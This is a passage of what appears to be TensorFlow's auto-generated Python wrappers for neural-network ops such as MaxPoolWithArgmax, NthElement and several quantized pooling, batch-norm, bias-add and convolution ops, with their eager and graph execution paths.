input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
4-D with shape `[batch, height, width, channels]`. Input to pool over.
ksize: A list of `ints` that has length `>= 4`.
The size of the window for each dimension of the input tensor.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
Targmax: An optional `tf.DType` from: `tf.int32, tf.int64`. Defaults to `tf.int64`.
include_batch_in_index: An optional `bool`. Defaults to `False`.
Whether to include batch dimension in flattened index of `argmax`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, argmax).
output: A `Tensor`. Has the same type as `input`.
argmax: A `Tensor` of type `Targmax`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolWithArgmax", name, input, "ksize", ksize, "strides",
strides, "Targmax", Targmax, "padding", padding,
"include_batch_in_index", include_batch_in_index)
_result = _MaxPoolWithArgmaxOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_with_argmax_eager_fallback(
input, ksize=ksize, strides=strides, Targmax=Targmax,
padding=padding, include_batch_in_index=include_batch_in_index,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_with_argmax' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_with_argmax' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if Targmax is None:
Targmax = _dtypes.int64
Targmax = _execute.make_type(Targmax, "Targmax")
if include_batch_in_index is None:
include_batch_in_index = False
include_batch_in_index = _execute.make_bool(include_batch_in_index, "include_batch_in_index")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolWithArgmax", input=input, ksize=ksize, strides=strides,
padding=padding, Targmax=Targmax,
include_batch_in_index=include_batch_in_index,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "Targmax",
_op._get_attr_type("Targmax"), "padding",
_op.get_attr("padding"), "include_batch_in_index",
_op._get_attr_bool("include_batch_in_index"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolWithArgmax", _inputs_flat, _attrs, _result)
_result = _MaxPoolWithArgmaxOutput._make(_result)
return _result
MaxPoolWithArgmax = tf_export("raw_ops.MaxPoolWithArgmax")(_ops.to_raw_op(max_pool_with_argmax))
def max_pool_with_argmax_eager_fallback(input, ksize, strides, padding, Targmax, include_batch_in_index, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_with_argmax' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_with_argmax' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if Targmax is None:
Targmax = _dtypes.int64
Targmax = _execute.make_type(Targmax, "Targmax")
if include_batch_in_index is None:
include_batch_in_index = False
include_batch_in_index = _execute.make_bool(include_batch_in_index, "include_batch_in_index")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
_inputs_flat = [input]
_attrs = ("ksize", ksize, "strides", strides, "Targmax", Targmax, "padding",
padding, "include_batch_in_index", include_batch_in_index, "T", _attr_T)
_result = _execute.execute(b"MaxPoolWithArgmax", 2, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolWithArgmax", _inputs_flat, _attrs, _result)
_result = _MaxPoolWithArgmaxOutput._make(_result)
return _result
def nth_element(input, n, reverse=False, name=None):
r"""Finds values of the `n`-th order statistic for the last dimension.
If the input is a vector (rank-1), finds the entries which is the nth-smallest
value in the vector and outputs their values as scalar tensor.
For matrices (resp. higher rank input), computes the entries which is the
nth-smallest value in each row (resp. vector along the last dimension). Thus,
values.shape = input.shape[:-1]
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
1-D or higher with last dimension at least `n+1`.
n: A `Tensor` of type `int32`.
0-D. Position of sorted vector to select along the last dimension (along
each row for matrices). Valid range of n is `[0, input.shape[:-1])`
reverse: An optional `bool`. Defaults to `False`.
When set to True, find the nth-largest value in the vector and vice
versa.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "NthElement", name, input, n, "reverse", reverse)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return nth_element_eager_fallback(
input, n, reverse=reverse, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if reverse is None:
reverse = False
reverse = _execute.make_bool(reverse, "reverse")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"NthElement", input=input, n=n, reverse=reverse, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("reverse", _op._get_attr_bool("reverse"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"NthElement", _inputs_flat, _attrs, _result)
_result, = _result
return _result
NthElement = tf_export("raw_ops.NthElement")(_ops.to_raw_op(nth_element))
def nth_element_eager_fallback(input, n, reverse, name, ctx):
if reverse is None:
reverse = False
reverse = _execute.make_bool(reverse, "reverse")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
n = _ops.convert_to_tensor(n, _dtypes.int32)
_inputs_flat = [input, n]
_attrs = ("reverse", reverse, "T", _attr_T)
_result = _execute.execute(b"NthElement", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"NthElement", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_QuantizedAvgPoolOutput = collections.namedtuple(
"QuantizedAvgPool",
["output", "min_output", "max_output"])
def quantized_avg_pool(input, min_input, max_input, ksize, strides, padding, name=None):
r"""Produces the average pool of the input tensor for quantized types.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
4-D with shape `[batch, height, width, channels]`.
min_input: A `Tensor` of type `float32`.
The float value that the lowest quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the highest quantized input value represents.
ksize: A list of `ints`.
The size of the window for each dimension of the input tensor.
The length must be 4 to match the number of dimensions of the input.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
tensor. The length must be 4 to match the number of dimensions of the input.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor`. Has the same type as `input`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedAvgPool", name, input, min_input, max_input, "ksize",
ksize, "strides", strides, "padding", padding)
_result = _QuantizedAvgPoolOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_avg_pool_eager_fallback(
input, min_input, max_input, ksize=ksize, strides=strides,
padding=padding, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'quantized_avg_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_avg_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedAvgPool", input=input, min_input=min_input,
max_input=max_input, ksize=ksize, strides=strides,
padding=padding, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "ksize", _op.get_attr("ksize"),
"strides", _op.get_attr("strides"), "padding",
_op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedAvgPool", _inputs_flat, _attrs, _result)
_result = _QuantizedAvgPoolOutput._make(_result)
return _result
QuantizedAvgPool = tf_export("raw_ops.QuantizedAvgPool")(_ops.to_raw_op(quantized_avg_pool))
def quantized_avg_pool_eager_fallback(input, min_input, max_input, ksize, strides, padding, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'quantized_avg_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_avg_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
_inputs_flat = [input, min_input, max_input]
_attrs = ("T", _attr_T, "ksize", ksize, "strides", strides, "padding",
padding)
_result = _execute.execute(b"QuantizedAvgPool", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedAvgPool", _inputs_flat, _attrs, _result)
_result = _QuantizedAvgPoolOutput._make(_result)
return _result
_QuantizedBatchNormWithGlobalNormalizationOutput = collections.namedtuple(
"QuantizedBatchNormWithGlobalNormalization",
["result", "result_min", "result_max"])
def quantized_batch_norm_with_global_normalization(t, t_min, t_max, m, m_min, m_max, v, v_min, v_max, beta, beta_min, beta_max, gamma, gamma_min, gamma_max, out_type, variance_epsilon, scale_after_normalization, name=None):
r"""Quantized Batch normalization.
This op is deprecated and will be removed in the future. Prefer
`tf.nn.batch_normalization`.
Args:
t: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A 4D input Tensor.
t_min: A `Tensor` of type `float32`.
The value represented by the lowest quantized input.
t_max: A `Tensor` of type `float32`.
The value represented by the highest quantized input.
m: A `Tensor`. Must have the same type as `t`.
A 1D mean Tensor with size matching the last dimension of t.
This is the first output from tf.nn.moments,
or a saved moving average thereof.
m_min: A `Tensor` of type `float32`.
The value represented by the lowest quantized mean.
m_max: A `Tensor` of type `float32`.
The value represented by the highest quantized mean.
v: A `Tensor`. Must have the same type as `t`.
A 1D variance Tensor with size matching the last dimension of t.
This is the second output from tf.nn.moments,
or a saved moving average thereof.
v_min: A `Tensor` of type `float32`.
The value represented by the lowest quantized variance.
v_max: A `Tensor` of type `float32`.
The value represented by the highest quantized variance.
beta: A `Tensor`. Must have the same type as `t`.
A 1D beta Tensor with size matching the last dimension of t.
An offset to be added to the normalized tensor.
beta_min: A `Tensor` of type `float32`.
The value represented by the lowest quantized offset.
beta_max: A `Tensor` of type `float32`.
The value represented by the highest quantized offset.
gamma: A `Tensor`. Must have the same type as `t`.
A 1D gamma Tensor with size matching the last dimension of t.
If "scale_after_normalization" is true, this tensor will be multiplied
with the normalized tensor.
gamma_min: A `Tensor` of type `float32`.
The value represented by the lowest quantized gamma.
gamma_max: A `Tensor` of type `float32`.
The value represented by the highest quantized gamma.
out_type: A `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`.
variance_epsilon: A `float`. A small float number to avoid dividing by 0.
scale_after_normalization: A `bool`.
A bool indicating whether the resulted tensor
needs to be multiplied with gamma.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (result, result_min, result_max).
result: A `Tensor` of type `out_type`.
result_min: A `Tensor` of type `float32`.
result_max: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedBatchNormWithGlobalNormalization", name, t, t_min,
t_max, m, m_min, m_max, v, v_min, v_max, beta, beta_min, beta_max,
gamma, gamma_min, gamma_max, "out_type", out_type, "variance_epsilon",
variance_epsilon, "scale_after_normalization",
scale_after_normalization)
_result = _QuantizedBatchNormWithGlobalNormalizationOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_batch_norm_with_global_normalization_eager_fallback(
t, t_min, t_max, m, m_min, m_max, v, v_min, v_max, beta, beta_min,
beta_max, gamma, gamma_min, gamma_max, out_type=out_type,
variance_epsilon=variance_epsilon,
scale_after_normalization=scale_after_normalization, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
out_type = _execute.make_type(out_type, "out_type")
variance_epsilon = _execute.make_float(variance_epsilon, "variance_epsilon")
scale_after_normalization = _execute.make_bool(scale_after_normalization, "scale_after_normalization")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedBatchNormWithGlobalNormalization", t=t, t_min=t_min,
t_max=t_max, m=m,
m_min=m_min, m_max=m_max,
v=v, v_min=v_min,
v_max=v_max, beta=beta,
beta_min=beta_min,
beta_max=beta_max,
gamma=gamma,
gamma_min=gamma_min,
gamma_max=gamma_max,
out_type=out_type,
variance_epsilon=variance_epsilon,
scale_after_normalization=scale_after_normalization,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "out_type",
_op._get_attr_type("out_type"), "variance_epsilon",
_op.get_attr("variance_epsilon"), "scale_after_normalization",
_op._get_attr_bool("scale_after_normalization"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedBatchNormWithGlobalNormalization", _inputs_flat, _attrs, _result)
_result = _QuantizedBatchNormWithGlobalNormalizationOutput._make(_result)
return _result
QuantizedBatchNormWithGlobalNormalization = tf_export("raw_ops.QuantizedBatchNormWithGlobalNormalization")(_ops.to_raw_op(quantized_batch_norm_with_global_normalization))
def quantized_batch_norm_with_global_normalization_eager_fallback(t, t_min, t_max, m, m_min, m_max, v, v_min, v_max, beta, beta_min, beta_max, gamma, gamma_min, gamma_max, out_type, variance_epsilon, scale_after_normalization, name, ctx):
out_type = _execute.make_type(out_type, "out_type")
variance_epsilon = _execute.make_float(variance_epsilon, "variance_epsilon")
scale_after_normalization = _execute.make_bool(scale_after_normalization, "scale_after_normalization")
_attr_Tinput, _inputs_Tinput = _execute.args_to_matching_eager([t, m, v, beta, gamma], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
(t, m, v, beta, gamma) = _inputs_Tinput
t_min = _ops.convert_to_tensor(t_min, _dtypes.float32)
t_max = _ops.convert_to_tensor(t_max, _dtypes.float32)
m_min = _ops.convert_to_tensor(m_min, _dtypes.float32)
m_max = _ops.convert_to_tensor(m_max, _dtypes.float32)
v_min = _ops.convert_to_tensor(v_min, _dtypes.float32)
v_max = _ops.convert_to_tensor(v_max, _dtypes.float32)
beta_min = _ops.convert_to_tensor(beta_min, _dtypes.float32)
beta_max = _ops.convert_to_tensor(beta_max, _dtypes.float32)
gamma_min = _ops.convert_to_tensor(gamma_min, _dtypes.float32)
gamma_max = _ops.convert_to_tensor(gamma_max, _dtypes.float32)
_inputs_flat = [t, t_min, t_max, m, m_min, m_max, v, v_min, v_max, beta, beta_min, beta_max, gamma, gamma_min, gamma_max]
_attrs = ("Tinput", _attr_Tinput, "out_type", out_type, "variance_epsilon",
variance_epsilon, "scale_after_normalization", scale_after_normalization)
_result = _execute.execute(b"QuantizedBatchNormWithGlobalNormalization", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedBatchNormWithGlobalNormalization", _inputs_flat, _attrs, _result)
_result = _QuantizedBatchNormWithGlobalNormalizationOutput._make(_result)
return _result
_QuantizedBiasAddOutput = collections.namedtuple(
"QuantizedBiasAdd",
["output", "min_out", "max_out"])
def quantized_bias_add(input, bias, min_input, max_input, min_bias, max_bias, out_type, name=None):
r"""Adds Tensor 'bias' to Tensor 'input' for Quantized types.
Broadcasts the values of bias on dimensions 0..N-2 of 'input'.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A 1D bias Tensor with size matching the last dimension of 'input'.
min_input: A `Tensor` of type `float32`.
The float value that the lowest quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the highest quantized input value represents.
min_bias: A `Tensor` of type `float32`.
The float value that the lowest quantized bias value represents.
max_bias: A `Tensor` of type `float32`.
The float value that the highest quantized bias value represents.
out_type: A `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_out, max_out).
output: A `Tensor` of type `out_type`.
min_out: A `Tensor` of type `float32`.
max_out: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedBiasAdd", name, input, bias, min_input, max_input,
min_bias, max_bias, "out_type", out_type)
_result = _QuantizedBiasAddOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_bias_add_eager_fallback(
input, bias, min_input, max_input, min_bias, max_bias,
out_type=out_type, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
out_type = _execute.make_type(out_type, "out_type")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedBiasAdd", input=input, bias=bias, min_input=min_input,
max_input=max_input, min_bias=min_bias,
max_bias=max_bias, out_type=out_type, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T1", _op._get_attr_type("T1"), "T2", _op._get_attr_type("T2"),
"out_type", _op._get_attr_type("out_type"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedBiasAdd", _inputs_flat, _attrs, _result)
_result = _QuantizedBiasAddOutput._make(_result)
return _result
QuantizedBiasAdd = tf_export("raw_ops.QuantizedBiasAdd")(_ops.to_raw_op(quantized_bias_add))
def quantized_bias_add_eager_fallback(input, bias, min_input, max_input, min_bias, max_bias, out_type, name, ctx):
out_type = _execute.make_type(out_type, "out_type")
_attr_T1, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_T2, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_bias = _ops.convert_to_tensor(min_bias, _dtypes.float32)
max_bias = _ops.convert_to_tensor(max_bias, _dtypes.float32)
_inputs_flat = [input, bias, min_input, max_input, min_bias, max_bias]
_attrs = ("T1", _attr_T1, "T2", _attr_T2, "out_type", out_type)
_result = _execute.execute(b"QuantizedBiasAdd", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedBiasAdd", _inputs_flat, _attrs, _result)
_result = _QuantizedBiasAddOutput._make(_result)
return _result
_QuantizedConv2DOutput = collections.namedtuple(
"QuantizedConv2D",
["output", "min_output", "max_output"])
def quantized_conv2d(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], name=None):
r"""Computes a 2D convolution given quantized 4D input and filter tensors.
The inputs are quantized tensors where the lowest value represents the real
number of the associated minimum, and the highest represents the maximum.
This means that you can only interpret the quantized output in the same way, by
taking the returned minimum and maximum values into account.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter's input_depth dimension must match input's depth dimensions.
min_input: A `Tensor` of type `float32`.
The float value that the lowest quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the highest quantized input value represents.
min_filter: A `Tensor` of type `float32`.
The float value that the lowest quantized filter value represents.
max_filter: A `Tensor` of type `float32`.
The float value that the highest quantized filter value represents.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by the
value of `data_format`, see above for details. Dilations in the batch and
depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2D", name, input, filter, min_input, max_input,
min_filter, max_filter, "out_type", out_type, "strides", strides,
"padding", padding, "dilations", dilations)
_result = _QuantizedConv2DOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_eager_fallback(
input, filter, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2D", input=input, filter=filter, min_input=min_input,
max_input=max_input, min_filter=min_filter,
max_filter=max_filter, strides=strides,
padding=padding, out_type=out_type,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2D", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DOutput._make(_result)
return _result
QuantizedConv2D = tf_export("raw_ops.QuantizedConv2D")(_ops.to_raw_op(quantized_conv2d))
def quantized_conv2d_eager_fallback(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations)
_result = _execute.execute(b"QuantizedConv2D", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2D", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DOutput._make(_result)
return _result
_QuantizedConv2DAndReluOutput = collections.namedtuple(
"QuantizedConv2DAndRelu",
["output", "min_output", "max_output"])
def quantized_conv2d_and_relu(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DAndRelu", name, input, filter, min_input,
max_input, min_filter, max_filter, "out_type", out_type, "strides",
strides, "padding", padding, "dilations", dilations, "padding_list",
padding_list)
_result = _QuantizedConv2DAndReluOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_and_relu_eager_fallback(
input, filter, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
